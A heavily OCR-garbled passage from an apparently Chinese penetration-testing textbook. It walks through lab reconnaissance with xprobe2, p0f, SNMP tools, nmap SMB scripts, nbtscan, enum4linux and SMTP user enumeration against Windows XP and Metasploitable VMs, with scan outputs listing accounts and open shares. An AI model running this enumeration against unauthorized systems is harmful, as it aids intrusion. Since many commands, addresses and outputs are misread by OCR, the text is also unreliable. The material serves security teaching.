Xprobe2 v.80.3 Copyright (c) 2662-2665 fyodor@ofo.nu, ofir@sys-security.com, meder@oBo.nu 
+] Host 192.168.1.193 Running 05: :B66U (Guess probability: 915) 
+] Other guesses: 

+] Host 192.168.1.163 Running OS: I666U (Guess probability: 91s) 
+] Host 192.168,1.193 Running DS; $:@66U (Guess probability; 91%) 
+] Host 192.168.1.193 Running 05: 6$:886U (Guess probability: 91%) 
+] Host 192.168.1.193 Running 05: :W660U (Guess probability: 915) 
+] Host 192.168.1.163 Runnin 9 DS: 6:6060U (Guess probability: 915) 
+] Host 192.168,1,193 Running 0S; 有 ;886U (Guess probability; 91%) 
+] Host 192.168.1.193 Running 0S: :6@86U (Guess probability: 91%) 
+] Host 192.168.1.193 Running 05: 6:666U (Guess probability: 915) 
+] Host 192.168.1.163 Running OS: 6:666U (Guess probability: 91s) 
+] Cleaning up scan engine 

+] Modules deinitialized 

[+] Execution completed, 


使 用 xprobe2 工 具 扫 描 Linux 系 统 ， 执 
行 效 果 如 下 图 所 示 。 


root@kali:~# xprobe2 192.168.1.165 


vr vv 一 一 vv 一 rv 


xprobe2 v.89.3 Copyright (c¢) 2992-2095 fyodor@ogo.nuyu, ofir@sys-security.com, meder@o8o.ny 


+] Host 192.168.1.165 Runnir g 0S: “ycY (Guess probability: 108%) 
+] Dther guesses: 

+] Host 192.168.1.165 Running 05: 
[+] Host 192.168.1.165 Running 0S : 
[+] Host 192,.168.1,165 Running Os: 
+] Host 192.168.1.165 Running 05: 


| “yYCV (Guess probability: 19095) 


“¥yCY [Guess probability: 1085) 
“YCV (Guess probability:; 199%5) 
“yYCV 【Guess probability: 1095) 
“YCV (Guess probability: 106s) 
“ycCV [Guess probability: 108%) 
“yYCV (Guess probability: 199%5) 
“YCV 【Guess probability: 19065) 
probability: 168s) 


+] Host 192.168.1.165 Running 0s: 
+] Host 192.168.1,.165 Running 0S: 
+] Host 192.168.1.165 Running 0S : 
+] Host 192.168.1.165 Running 05: 
+] Host 192.168.1.165 Running 0S: “ycCY (Guess 
+] Cleaning up Scan engine 

+] Modules deinitialized 
[+] Execution completed, 


上 
上 
F 
- 
上 
F 
[ 
F 


2. 被 动 式 扫 接 


通过 网 络 监听 、 抓 包 的 方式 收集 信 
息 ， 结 合 ARP 地 址 欺骗 〈 可 以 实现 端口 镜 
像 的 效果 ) 抓 取 数据 包 可 以 识别 全 网 段 系 
统 类 型 。 

使 用 Kali 系 统 中 的 一 款 被 动 扫 描 工 
具 p0f， 可 以 进行 被 动 式 扫 描 。 操 作 步 又 
如 下 : 
打开 p0f 工 具 ， 上 默认 开始 监听 eth0 网 
卡 ， 执 行 效果 如 下 图 所 示 。 


Pe ~# pof 
--- pof 3.09b by Michal Zalewski <lcamtuf@coredump.cx> --- 


[+] Closed 1 file descriptor. 

[+] Loaded 322 Signatures from '/etc/pQf/pQf.fp'. 

[+] Intercepting traffic on default interface 'ethg ' . 
[+] Default packet filtering configured [+VLAN] . 

[+] Entered main event loop. 


一 旦 有 数据 包 经 过 eth0 网 Peg se 
捕获 ， 通 过 捕获 的 数据 包 进 行 分 析 ， 它 

将 收集 到 的 信息 全 部 在 终端 输出 ， 二 
还 是 比较 大 的 ， 这 里 只 截取 了 部 分 信息 ， 

如 下 图 所 示 。 通 过 分 析 这 些 信 息 ， 可 以 探 
索 主机 的 操作 系统 类 别 。 
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-[ I92.TI68.TI.IGI73990g -> 561.213.183.154/89 (syn) J- 


client = 192.168.1.1691/4990D 
05 = Linux 3.11 and newer 
dist = 

params = none 


raw Sig = 4:64+0:0:1460:mss*20,7:ms5,sok,ts,nop,ws:df,id+:0 


-| 192.168.1.161/499699 -> 61.213.183.154/89 (http request) ]- 


| client = 192.168.1.101/49900 

| app = Safari 5.1-6 

| lang = English 

| params = dishonest 

| raw sig = 1l:Host,User-Agent,Accept=[*/*],Accept-Language=[en-USs,en; 


=0.5] ,Accept-Encoding=[gzip, deflate],?Cache-Control,Pragma=[no- cache 
,Connection=[keep-alive]:Accept-Charset,Keep-Alive:Mozilla/5.0 (X11; 
inux x86 64; rv:60.0) Gecko/20160191 Firefox/60.9 


11.2.3 扫 摘 SNMP 


SNMP 是 简单 网 络 管理 协议 ， 使 用 的 是 
UDP 端口 中 的 161、162 端 口 ， 其 中 ， 服 务 
端 使 用 的 是 161 端 口 ， 客 户 端 使 用 的 是 162 
端口 。 通 过 SNMP 可 以 管理 网 络 中 的 交换 
机 、 服 务 器 、 防 火 墙 等 设备 ， 从 而 查看 网 
络 中 这 些 设备 的 详细 信息 。 


1. 构建 测试 环境 


这 里 采用 虚拟 机 安装 Windows XP 操 作 
系统 来 进行 测试 。 如 何 安装 Windows XP 系 
统 这 里 不 做 讲解 ， 只 讲解 如 何在 Windows 
XP 系统 下 配置 SNMP。 

具体 的 操作 步骤 如 下 : 
打开 控制 面板 ， 找 到 “添加 /删除 程 
序 ” 图 标 ， 如 下 图 所 示 。 


WP 全， 
让 人 添加 /删除 程序 


在 打开 的 “添加 或 删除 程序 ”对 话 框 
中 ， 单 击 “ 添 加 删除 Windows 组 件 ” 图 标 ， 
如 下 图 所 示 。 


中 系 加 或 删除 征 序 


排序 方式 (3 [名 了 | 


三 普 示 更 新 站 
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打开 “Windows 组 件 向 导 ” 对 话 框 ， 
双击 “管理 和 监视 工具 ”组 件 ， 如 下 图 
所 示 。 


findews 才 件 
可 以 添加 或 基隆 Wi adows XF 的 过 和 几 。 


国 吾 新 根 目 录 证 书 0.0 ME 

口 加 管理 和 上 晓 视 工 琶 2.0 呈 一 | 
口 双 其 地 网 阁 京 件 和 打印 服 芳 0.0 NB -| 
挫 述 : 内 [和 开始] 菜单 各 泉 面 添 加 或 删 际 对 Iniernet Explorer 的 让 问 
所 需 磁 盘 空间 : 56.9 WE EE 

可 用 谱 招 空间 : 33027.6 是 72 


《< 上 一 步 电 ) 取消 ”| 


打开 “管理 和 监视 工具 ”对 话 框 ， 在 
其 中 选中 管理 和 监视 工具 的 子 组 件 列表 框 
中 两 个 选项 ， 如 下 图 所 示 。 


四 
要 于 加 区 旺 哈 其 人 如 垢 ,读音 这 的 外 法 框 。 区 色 答 表示 只 会 安装 访 组 件 的 一 
管理 和 上 完工 具 的 子 姐 件 C); 


间 简单 网 络 管理 协议 


step 图 单 去 “确定 ”按钮 ， 会 提示 插入 安装 
光盘 ， 如 下 图 所 示 。 
FE > 


(:) 请 格 标 为 ‘Windows XP Mose 二 
ack cp -RO 驱动 器 i) 
~ 后 单 击 “确定 ”， 


如 果 要 从 另 一 个 位 置 一 个 软盘 或 网 络 服务 器 ) 
复制 文件 ， 也 可 以 单 击 “ 确 定 ”。 


完成 “Rindows 组 件 向 导 ” 


您 已 成 功 地 元 成 了 下 ndows 组 件 向 导 。 


请 单 击 “完成 ”不详 闭 此 阿 导 - 
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安装 完成 后 在 服务 中 会 多 出 两 项 基于 
SNMP 的 服务 ， 如 下 图 所 示 。 
管理 此 计算 ,，,， 手动 


本 地 服务 


多 95mart Card 
NMP Service 包含 代理 和 枉 ,,， 
钨 85NMP Trap 5ervice 接收 由 本 地 ,,， 
继 %55DP Discovery 5er,,， 启 动 您 家 庭 ,， 


双击 SNMP Service， 和 选择 “安全 ?” 
选项 卡 ， 可 以 看 到 默认 配置 是 public 并 且 
接受 来 自任 何 主机 的 SNMP 数 据 包 ， 如 下 图 
所 示 。 


本 地 服务 
本 地 服务 


已 启动 ”手动 
已 启动 ”手动 


5NMP 5ervice 的 尾 性 (本 地 计算 机 ) ?|x| 
常规 | 登录 | 恢复 | 代理 | 陷 并 ”安全 | 依存 关系 | 
| 滨 庆 身份 驻 证 陷 际 人 Ui 
-接受 团体 名 称 辑 
国体 


湛 mm) .| 编辑 人 | 基隆 多 ) | 


f+ 接受 来 自任 何 主 可 的 SWF 涛 据 了 包公 
一 个 接受 来 自 这 些 主 术 的 5WWE 和 包 们 ) 


| 


2. onesixtyone 工 具 


onesixtyone 工 具 是 针对 SNMP 进 行 扫 
描 的 小 工具 ， 使 用 该 工具 可 以 扫描 探测 
SNMP。 有 具体 操作 步骤 如 下 : 


使 用 onesixtyone 192.168.1.103 public 
命令 ， 探 测 SNMP， 如 下 图 所 示 。 


root@kali:~# onesixtyone 192,165.1.163 public 

scanning 1 hosts, 1 communities 

192.168.1.193 [public] Hardware: x86 Family 16 Model 19 Stepping © AT/AT 
COMPATIBLE - 
Free) 


onesixtyone 工 具 支 持 字 典 方式 查 
询 ， 因 此 使 用 dpkg -L onesixtyone 命 令 查 
看 它 是 否 自 带 字 典 文件 ， 执 行 效果 如 下 图 
所 示 。 


root@kali:-~# dpkg -L onesixtyone 
/. 

/usr 

/usr/bin 

/usr/bin/onesixtyone 

/usr/share 

/usr/share/doc 
/usr/share/doc/onesixtyone 
/usr/share/doc/onesixtyone/README 
/usr/share/doc/onesixtyone/changelog.Debian.amd64.9gz 
/usr/share/doc/onesixtyone/changelog.Debian.gz 
/usr/share/doc/onesixtyone/changelog.gz 
/usr/share/doc/onesixtyone/copyright 
/usr/share/doc/onesixtyone/dict.txt 
/usr/share/man 

/usr/share/man/manl 
/usr/share/man/manl/onesixtyone.1.gz 


如 果 使 用 字典 扫描 ， 可 以 使 用 
onesixtyone -c dirct.txt 192.168.1.103 -o 
my.log -w 100 命 令 ， 其 中 dirct 是 字典 文 


Software: Windows 2060 Version 5.1 (Build 2606 Uniprocessor 


件 ，-o 是 输出 内 容 到 一 个 文件 ，-w 设 置 超 时 


时 间 (单位 ms) 。 
(全 注意 : SNMP 是 明文 传输 ， 因 此 可 以 利 
用 抓 包 来 获得 目标 的 community。 


3. snmpwalk 工 具 


snmpwalk 是 一 个 通过 SNMP GET-NEXT 
类 型 PDU， 实 现 对 目标 agent 的 某 指 定 MIB 
分 文 信息 进行 完整 提取 并 输出 的 工具 。 语 
法 格式 如 下 : 


snmpwalk[ 选 项 ] agent [oid] 


常用 参数 介绍 如 下 : 


e _h: 显示 帮助 。 

e -v1|2c|3: 指定 SNMP 版 本 。 

e -V: 显示 当前 snmpwalk 命 令 行 
版 本 。 

e -TI: 指定 重 斌 次数 ， 默 认为 0 次 。 


-t: 指定 每 次 请 求 的 等 待 超时 时 间 ， 
单位 s， 默 认为 3s。 

e -Cc: 指定 当 在 WALK 时 ， 如 果 发 现 

负增长 将 是 否 继续 WALK。 

i snmpwalk 工 具 可 以 查看 的 信息 相 

对 比较 多 。 使 用 snmpwalk 192.168.1.103 

-c public -v 2c 命 令 ， 由 于 信息 比较 多 ， 这 

只 截取 了 其 中 一 部 分 作为 展示 ， 如 下 图 

所 示 。 


root@Kkali:~# snmpwalk 192.1658.1.153 -C public -v Zc 

Created directory: /var/lib/snmp/mib indexes 

iso.3.6.1.2.1.1.1.98 = STRING: "Hardware: x86 Family 16 Model 19 Stepping @ AT/AT 
COMPATIBLE - Eo Windows 2600 Version 5.1 (Build 2600 Uniprocessor Free)" 
iso.3.6.1.2.1.1.2.8 = DID: iso.3.6.1.4.1.311.1.1.3.1.1 

a Timeticks: (451478) 1:15:14.78 


iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "System Idte Process" 
is0.3.6.1.2.1.25.4.2.1.2.4 = STRING: "System" 
iso.3.5.1.2.1.25.4.2.1.2.172 = STRING: “snmp.exe" 
Lso0.3.6.1.2.1.25.4.2.1.2.360 = STRING: "smss.exe" 
Ls0.3.6.1.2.1.25.4.2.1.2.448 = STRING: "logon.scr" 
iso.3.6.1.2.1.25.4.2.1.2.484 = STRING: "mmc .exe" 
Lso.3.6.1.2.1.25.4.2.1.2.508 = STRING: “csrss.exe'" 
iso.3.5.1.2.1.25.4.2.1.2.532 = STRING: "winlogon.exe”" 
E50.3.6.1.2.1.25.6.3.1.1.1 = INTEGER: 1 
is0,3.5.1,.2.1.25.5.3,1.2,.1 = STRING: "WebFldrs xP" 
E30.3.6.1.2.1.253.6.3.1.3.1 = OID: ceitt.8 
Eso.3.6.1.2.1.25.6.3.1.4.1 


= INTEGER: 4 
= > : O07 E2 OA 1A QF 39 30 BQ 


网 提示 : ISO 后 面 的 数字 便 是 内 部 库 的 ID 


号 ， 包 括 了 操作 系统 信息 ， 进 程 信 息 、 硬 
件 信息 、MAC 地 址 、IP 地 址 等 。 


snmpwalk 工 具 还 文 持 通过 内 部 库 ID 


号 的 形式 查询 ， 使 用 的 命令 为 snmpwalk -c 
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public -v 2c 192.168.1.1.133 < 具体 ID>。 锦 
用 的 方法 总 结 如 下 : 

(1) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.25.1 命令 取得 Windows 
端的 系统 进程 用 户 数 等 ， 其 中 -v 指 版 本 ，-c 
指 密 钥 。 

(2) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.25.2.2 命令 取得 系统 
总 内 存 。 

(3) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 hrSystemNumUsers 命令 取得 系统 
用 户 数 。 

(4) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.4.20 命令 取得 全 信息 。 

(5) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 system 命令 查看 系统 信息 。 

(6) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 ifDescr 命令 获取 网 卡 信 息 。 

snmpwalk 功 能 还 有 很 多 ， 可 以 获取 
系统 各 种 信息 ， 只 要 更 改 后 面 的 信息 类 型 
即 可 ， 如 果 不 知 道 什 么 类 型 ， 也 可 以 不 指 
定 ， 如 果 不 指定 将 获取 所 有 信息 。 


4. snmpcheck 工 具 


snmpwalk 显 示 的 信息 非常 多 但 是 不 易 
向 读 ， 而 snmpcheck 会 显示 具体 信息 名 称 
更 方便 使 用 者 阅读 ， 使 用 snmpcheck 要 输入 
snmpcheck 命 令 〈 直 接 输入 snmpcheck 会 出 
现 图 形 化 工具 ) 。 

使 用 snmpcheck 工 具 的 操作 步骤 如 下 : 
使 用 snmpcheck -h 命 令 ， 打 开 帮 助 信 
息 ， 可 以 查看 参数 信息 ， 但 可 以 看 到 参数 
并 不 多 ， 如 下 图 所 示 。 


root@kali:-~# snmpcheck -h 


Usage: snmpcheck [-xj [-nlyl [-h] [-H] [-V NUM] [-L] [-f] [LIL-al HOSTS] 


-h Display this message. 
-a check error log file AND hosts specified on command line. 
-Pp Don't try and ping-echo the host first 
-f only check for things I can fix 
HOSTS check these hosts for problems. 


X Options: 


-X forces ascii base if $DISPLAY set (instead of tk). 

-H start in hidden mode. (hides user interface) 

-V NUM sets the initial verbosity level of the command log (def: 1) 
L Show the (log window at startup 


-gd Don't start by checking anything. Just bring up the interface. 


Ascii Options: 
-nn Don't ever try and fix the problems found. Just list. 
-y Always fix problems found. 
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使 用 snmp-check 192.168.1.103 命 令 
可 以 查看 主机 的 snmp 人 信息。 下 图 为 查询 出 
来 的 主机 系统 信息 。 


[*] System information: 


Host IP address 
Hostname : 111111-9B22E0A4 
Description : Hardware: x86 Family 16 
Model 10 Stepping 6 AT/AT COMPATIBLE - Software: Windows 
2000 Version 5.1 (Build 2609 UapFecessor Free) 
Contact - 
Location 
Uptime snmp 
Uptime system 
System date 
| Domain 


| 下 图 为 查询 出 来 的 用 户 信息 。 


[*] User accounts: 


: 192.168.1.103 


-| Ei 05:27:29.84 

: 91:55:48.67 

: 2018-10-28 13:47:59.3 
: WORKGROUP 


Guest 

Administrator 
HelpAssistant 
SUPPORT 388945a0 


下 图 为 查询 出 来 的 网 络 信 息 。 


[*] Network inTormation: 
IP forwarding enabled : no 
Default TTL : 128 
TCP segments received : 181 
TCP segments sent : 231 
TCP segments retrans :0 
Input datagrams : 6663 
Delivered datagrams : 6661 
0utput datagrams : 1118 
下 图 为 查询 出 来 的 UDP 端 口 开放 
信息 。 
[*] Listening UDP ports : 

Local address Local port 
0.0.0.0 161 
0.0.0.0 162 
606.0.0.0 445 
0.0.0.0 500 
0.0.0.0 4509 
127.0.0.1 123 
127.0.0.1 1900 
192 .168.1.103 123 
192 .168.1.103 137 
192 .168.1.103 138 

1900 


11.2.4 ”扫描 SMP 协 议 


SMB (Server Message Block) 是 一 个 
协议 名 ， 它 被 用 于 Web 连 接 和 客户 端 与 服务 
器 之 间 的 信息 沟通 ， 其 目的 是 将 DOS 操 作 
系统 中 的 本 地 文件 接口 “中 断 13” 改 造 为 
网 络 文件 系统 。 


1. Nmap 工 具 


使 用 Nmap 工 具 可 以 扫描 SMP 协 议 ， 具 
体操 作 步 又 如 下 : 
使 用 Nmap -vv -p139,445 192.168.1.1- 
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200 命 令 ， 可 以 扫描 一 个 网 段 中 开放 了 
139、445 端 口 的 机 器 。 扫 描 出 4 台 机 器 ， 其 
中 各 有 两 台 开 启 了 139、445 端 口 ， 如 下 图 
所 示 。 参 数 -vv 是 显示 更 加 详细 的 信息 。 


canning 4 hosts [2 ports/host] 

iscovered open port 445/tcp on 192.168.1.105 

iscovered open port 445/tcp on 192.168.1.103 

iscovered open port 139/tcp on 192.168.1.105 

iscovered open port 139/tcp on 192.168.1.103 

ompleted SYN Stealth Scan at 02:57, 1.24s elapsed (8 total ports 


下 图 为 IP 地 址 为 192.168.1.103 的 详细 
全 自 


词 Jr o 


Nmap scan report for 192.168.1I.103 
Host is up, received arp-response (9060.900415 Latency) , 
Scanned at 2018-10-28 02:57:24 EDT for 23S 


PORT STATE SERVICE REASON 

139/tcp open netbios-ssn syn-ack ttl 128 
445/tcp open microsoft-ds syn-ack ttl 128 
MAC Address: 00:0C:29:A2:4E:07 (VMware) 


下 图 为 IP 地 址 为 192.168.1.105 的 详细 
3| 


玫 3o 


Nmap scan report for 192.168.1.165 
Host is up, received arp-response (0.090038s latency), 
Scanned at 2018-10-28 02:57:24 EDT for 23s 


PORT STATE SERVICE REASON 

139/tcp open netbios-ssn syn-ack ttl 64 
445/tcp open microsoft-ds syn-ack ttL 64 
MAC Address: 060:0C:29:FA:DD:2A (VMware) 


Step 区 通过 TTL 信 息 可 以 区 分 出 103 有 是 
Windows 系 统 ，105 是 Linux/Unix 系 统 。 使 用 
Nmap 192.168.1.103 -p139.443 --script=smb- 
os-discovery.nse 命 令 ， 可 以 有 针对 性 地 进行 
扫描 ， 执 行 效果 如 下 图 所 示 。 该 命令 主要 
用 于 确认 开放 了 139、445 端 口 的 设备 是 否 为 
Windows 系 统 ， 可 以 看 到 通过 添加 脚本 ， 再 
进行 扫描 ， 信 息 就 非常 准确 了 。 


root@kali:-## nmap 192.168.1.103 -pl39,445 --script=smb-os-discovery.nse 
Starting Nmap 7.76 ( https://nmap.org ) at 2618-19-28 8683:25 EDT 
Nmap scan report for 192.168,1.103 

Host is up (9.60945s Latency | . 


PORT STATE SERVICE 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

MAC Address: 0996:DC:29:A2:4E:097 (VMware) 


Host script results: 

| smb-o0s-discovery: 

| 05: Windows XP (Windows 2060 LAN Manager) 

| 0S CPE: cpe:/0o:microsoft:windows xp::- 

| Computer name: 11111]1-9b?22e6a4 

| NetBI05 computer name: 111111-9B22E9A4\x00 
| Workgroup: WDRKGROUPNXBDO 

| System time: 2018-10-28T15:25:09+08:00 


Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds 


使 用 相同 的 脚本 对 上 比 打 描 Linux 系 
统 ， 同 样 可 以 扫描 出 一 些 信 息 ， 如 下 图 
所 示 。 
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root@kali:/usr/share/nmap/scripts# nmap 192.168.1.165 -p139,445 --script=smb-os-discovery.nse 
tarting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 03:37 EDT 

map scan report for 192.168.1.105 

Host is up (9.99060475 latency)}. 


PORT STATE SERVICE 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

MAC Address: 00:6C:29:FA:DD:2A (VMware) 


Host Script results: 

| smb-os-discovery: 

| 0S: Unix (Samba 3.0.20-Debian) 

| NetBIOS computer name: 

| Workgroup: WORKGROUP\xX80 

| System time: 29018-19-28T03:33:28-04:00 


Nmap done: 1 IP address (1 host up) scanned in 0.85 secords 


移 提 示 : 在 Kali 系 统 中 的 usr/share/Nmap/scripts 目 录 下 存放 了 近 600 个 Nmap 的 脚本 文件 ， 如 
下 图 所 示 。 针 对 不 同 的 扫描 都 可 以 找到 相应 的 脚本 文件 。 


Foot@kali:/usr/share/nmap/scripts#¥ 1s 

Bcarsd-info.nse http-grep.nse nntp-ntlm-info.nse 
Bddress-info.nse http-headers.nse nping-brute.nse 
afp-brute.nse http-huawei-hg5xx-vuln.nse nrpe-enuym .nse 
afp-ls.nse http-icloud-findmyiphone.nse ntp-info.nse 
Bfp-path-vuln.nse http-icloud-sendmsg.nse ntp-monlist.nse 
afp-serverinfo.nse http-iis-short-name-brute.nse omp2-brute.nse 
BAfp-showmount.nse http-iis-webdav-vuln.nse omp2-enum- targets.nse 
Bjp-auth.nse http-internal-ip-disclosure.nse omron-info.nse 
Bjp-brute.nse http-joomla-brute.nse openlooxup-info.nse 
ajp-headers.nse http-jsonp-detection.nse openvas-otp-brute.nse 
Bjp-methods.nse http-litespeed-sourcecode-download.nse openwebnet-discovery.nse 
Bjp-request.nse http-ls.nse oracle-brute.nse 
BAllseeingeye-info.nse http-majordomo2-dir-traversal.nse oracle-brute-stealth.nse 
pmqp -info .nsc hLLbp-matwarc-hoslL.rnsec oracte-cnunm-uscrs ,TSc 
Bsn-query.nse http-mcmp.nse oracle-sid-brute.nse 
Bauth-owners.nse http-methods.nse oracle-tns-version.nse 
Buth-spoof.nse http-method-tamper.nse ovs-agent-version.nse 
backorifice-brute.nse http-mobileversion-checker.nse p2p-conficker.nse 
nee ttn bi http-ntlm-info.nse path-mtu.nse 
acnet-info.nse http-open-proxy.nse pcanywhere-brute.nse 
banner.nse http-open-redirect.nse peworx-info.nse 
bitcoin-getaddr.nse http-passwd.nse pgsql-brute.nse 


这 里 给 出 一 个 通过 脚本 扫描 ， 来 判断 主机 是 否 存 在 smb 漏 洞 ， 下 面 是 脚本 当中 给 出 的 
参考 方式 。 另 外 只 作为 测试 使 用 ， 脚 本 扫描 可 能 会 损毁 主机 系统 。 


-— Nmap --script Smb-vuln-ms06-025 .nsSse -p445 <host> 
Nmaly SU — Seript sm vln m00 025 mmSE DD U131 T1339 host> 


上 述 脚本 中 会 有 使 用 方法 的 详细 描述 ， 除 此 之 外 还 会 给 出 该 脚本 针对 哪些 漏洞 进行 了 
扫描 。 


2. nbtscan 工 具 


使 用 nbtscan 工 具 进 行 扫描 的 方法 为 : 使 用 nbtscan -r 192.168.1.0/24 命 令 进行 扫描 ， 执 
行 效果 如 下 图 所 示 。 


rootGkaLI:-~-# nbtscan -r 192.168.1.0/24 
Doing NBT name Scan for addresses from 192.168.1.0/24 


IP address NetBIOS Name Server User MAC address 
192.168.1.0 Sendto failed: Permission denied 

192 .168.1.101 <Unknown> <Unknown> 

192.168.1.103 111111-9B22E6A4 <server> <unknown> 00:0c:29:a2:4e:07 


192.168.1.105 METASPLOITABLE <server> METASPLOITABLE 960:006:600:00:60606:00 


nbtscan 的 优势 在 于 如 果 了 网络 防火 墙 规 则 设置 不 严谨 ， 它 可 以 实现 路 网 段 扫描 ， 例 如 : 
主机 地 址 为 -192.168.1.101， 目 标 主机 地 址 为 -192.168.2.102， 此 时 使 用 nbtsan 可 以 实现 跨 网 
段 扫 描 。 
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3. enum4linux 工 具 


使 用 enum4linux 工 具 进 行 扫描 的 操作 步骤 如 下 : 
[step 回 使 用 enum4linux -a 192.168.1.103 命 令 ， 扫 描 Windows 系 统 ， 执 行 效果 如 下 图 所 示 。 


root@kali:-# enum4linux -a 1392.168.1.103 
starting enum4Linux v9.8.9 ( http://1labs.portcullis,co.uk/application/enum4linyux/ ) on Sun Oct 28 G4:25:64 26018 


Yerget Soo ssasses 192.168.1.183 


RID Range ........ 5860-550, 1908-1050 

Username ......... " 

Password ......... 

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none 


[step 图 在 扫描 结果 中 ， 查 询 基 于 SMP 协 议 开 启 了 哪些 服务 ， 如 下 图 所 示 。 


Looking up status of 192.168.1.103 


111111-9B22E0A4 <00> - B <ACTIVE> Workstation Service 
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name 
111111-9B22E0A4 <20> - B <ACTIVE> File Server Service 
WORKGROUP <le> - <GROUP> B <ACTIVE> Browser Service Elections 


MAC Address = 00-0C-29-A2-4E-07 


[step 图 使 用 enum4linux 工 具 尝 试 建立 空 连 接 ， 执 行 效果 如 下 图 所 示 。 如 果 存 在 空 连接 这 
将 会 给 出 提示 。 


+] Server 192.168.1.103 allows sessions using username '', password ' 


使 用 enum4linux 工 具 扫 描 Linux 系 统 ， 执 行 效果 如 下 图 所 示 。 


Foot@kali:-# enum4linux -a 192.168.1.105 
btarting enum4Linux ve.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct 28 64:34:13 2018 


arget esasesassa 192.168.1.195 

RID Range ........ 500-558,16900-1050 

Username ......... 

Password ......... 

Known Usernames .. administrator, quest, krbtat, domain admins, root, bin, none 


[step 图 查询 扫描 结果 中 ， 基 于 SMP 协 议 开启 了 哪些 服务 ， 如 下 图 所 示 。 


Looking up status of 192.168.1.105 

METASPLOITABLE <00> - B <ACTIVE> Workstation Service 

METASPLOITABLE <03> - B <ACTIVE> Messenger Service 

METASPLOITABLE <20> - B <ACTIVE> File Server Service 
MSBROWSE . <01> - <GROUP> B <ACTIVE> Master Browser 


WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name 
WORKGROUP <1ld> - B <ACTIVE> Master Browser 
WORKGROUP <le> - <GROUP> B <ACTIVE> Browser Service Elections 


MAC Address = 00-00-00-00-060-00 


[step 较 查询 扫描 结果 中 ， 扫 描 出 来 的 系统 信息 ， 如 下 图 所 示 。 


Use of uninitialized value $os info in concatenation (.) or string at .Venum4Linux.PL Line 464, 
兽 Got 0S info for 192.168.1.1905 from smbclient: 

+] Got 05 info for 192.168.1.165 from srvinfo: 

METASPLOITABLE Vk Sv PrQ Unx NT SNT metasploitable server (Samba 3.6.20-Debian) 


platform id : 500 
05 version : 4.9 
server type - Ox9a03 


stp 图 查询 扫描 结果 中 ， 扫 描 出 来 的 用 户 相关 信息 。 这 里 只 截取 了 其 中 部 分 信息 ， 如 下 图 
ey 
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ndex: 9xl RID: OQx3f2 acb: Ox00000011 Account: games Name: games Desc: (null) 
ndex: Ox2 RID: QOx1f5 acb: Ox00000011 Account: nobody Name: nobody Desc: (null) 
ndex: Ox3 RID: Ox4ba acb: Ox00000011 Account: bind Name: (null) Desc: (null) 
ndex: Ox4 RID: Ox402 acb: Ox00000011 Account: proxy Name: proxy Desc: (null) 
ndex: 9x5 RID: Ox4b4 acb: Ox00000011 Account: syslog Name: (null) Desc: (null) 
ndex: Ox6 RID: Oxbba acb: Ox00000010 Account: user Name: just a USser,111,，Desc: (null) 
ndex: 9x7 RID: Ox42a acb: Ox00000011 Account: www-data Name: www-data Desc: (null) 
ndex: QOx8 RID: Ox3e8 acb: Ox00000011 Account: root Name: root Desc: (null) 
ndex: 9x9 RID: 9x3fa acb: Ox00000011 Account: news Name: news Desc: (null) 
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pri 
tmp 
opt 
IPC 
ADM 
econnectin 


ser 


查询 扫描 结果 


nts$ Disk Printer Drivers 


Disk oh noes! 

Disk 
$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) 
INS$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) 
g with SMB1 for workgroup Listing . 
Ver Comment 


中 ， 探 测 出 了 存在 哪些 共享 路 径 ， 哪 些 可 以 访问 ， 如 下 图 所 示 。 


[+] Attempting to map shares on 192.168.1.1905 
//192.168.1.1065/print$ Mapping: DENIED, Listing: N/A 
//192.168.1.105/tmp Mapping: OK, Listing: OK 
//192.168.1.105/0opt Mapping: DENIED, Listing: N/A 
//192.168.1.105/IPC$ [E] Can't understand response : 
NT STATUS NETWORK ACCESS DENIED Listing \* 
//192.168.1.105/ADMIN$ Mapping: DENIED, Listing: N/A 


(全 注意 : 在 扫描 结果 中 ， 还 有 一 些 其 他 信息 ， 这 里 不 再 一 一 列 出 。 


11.2.5 ” 扫 摘 SMTP 


扫描 SMTP 最 主要 的 作用 是 发 现 目 标 主机 上 的 邮件 账号 ， 通 过 主动 对 目标 的 SMTP 
《邮件 服务 器 ) 发 动 扫描 ， 发 现 可 能 存在 的 漏洞 并 收集 邮件 账号 等 信息 。 用 户 可 以 通过 抓 
包 或 者 字典 枚 举 的 方式 发 现 账号 。 
使 用 Nmap 工 具 可 以 进行 SMTP 扫 描 ， 具 体 的 方法 为 : 使 用 Nmap --script smtp-enum- 
users.nse [--script-args smtp-enum-users.methods=VRFY -p 25,465,587 192.168.1.105 命 令 ， 对 
邮件 服务 器 答 试 用 户 账号 扫描 ， 执 行 效果 如 下 图 所 示 。 


map done : 


root@kali:-# nmap --script smtp-enum-users.nse [--script-args smtp-enum-users.methods= 
RFY -p 25,465,587 192.168.1.165 

tarting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 694:58 EDT 

Failed to resolve "[--script-args". 

Failed to resolve "smtp-enum-users.methods=VRFY". 

map scan report for 192.168.1.165 


ost is Up 


ORT STATE SERVICE 
5/tcp open smtp 
| smtp-enum-users: 


| Method 


65/tcp closed smtps 
87/tcp closed submission 
AC Address: 00:0C:29:FA:DD:2A (VMware) 


map done: 


1 IP address (1 host Up) scanned in 1.30 seconds 


(0.00065s latency). 


RCPT returned a unhandled status code. 


1 IP address (1 host Up) scanned in 0.70 Seconds 


以 上 命令 还 可 以 加 入 一 个 账号 字典 来 进行 扫描 ， 命 令 为 Nmap --script 


smtp-enum- 
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users.nse [|--script-args smtp-enum-users. 
methods=VRFY -u user.txt-p 25,465,587 
